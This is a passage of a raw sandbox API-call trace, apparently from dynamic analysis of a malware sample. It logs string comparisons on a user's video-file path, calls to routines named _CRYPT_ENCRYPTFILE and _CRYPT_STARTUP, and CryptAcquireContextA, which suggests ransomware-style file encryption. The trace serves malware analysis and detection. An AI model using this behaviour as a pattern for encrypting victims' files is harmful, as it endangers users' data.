HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HX538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="538Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="38Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ki1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9kkkj.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0195.309] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0195.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0195.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0195.309] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0195.309] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0195.309] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0195.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0195.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0195.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0195.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0195.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0195.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0195.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0195.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0195.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0195.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0195.311] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x50adf490, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 0x90af58 [0195.316] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0195.318] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0195.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0195.318] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0195.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0195.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0195.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0195.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0195.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0195.323] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0195.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0195.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0195.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0195.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0195.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0195.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0195.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0195.326] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0195.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0195.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0195.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0195.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0195.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0195.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0195.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0195.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0195.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0195.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0195.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0195.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0195.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0195.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0195.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0195.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0195.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0195.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0195.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0195.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0195.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0195.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0195.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0195.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0195.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0195.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0195.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0195.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0195.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0195.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0195.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0195.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0195.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0195.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0195.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0195.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0195.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0195.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0195.432] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0195.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0195.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0195.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0195.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0195.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0195.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0195.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0195.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0195.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0195.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0195.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0195.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0195.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0195.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0195.447] 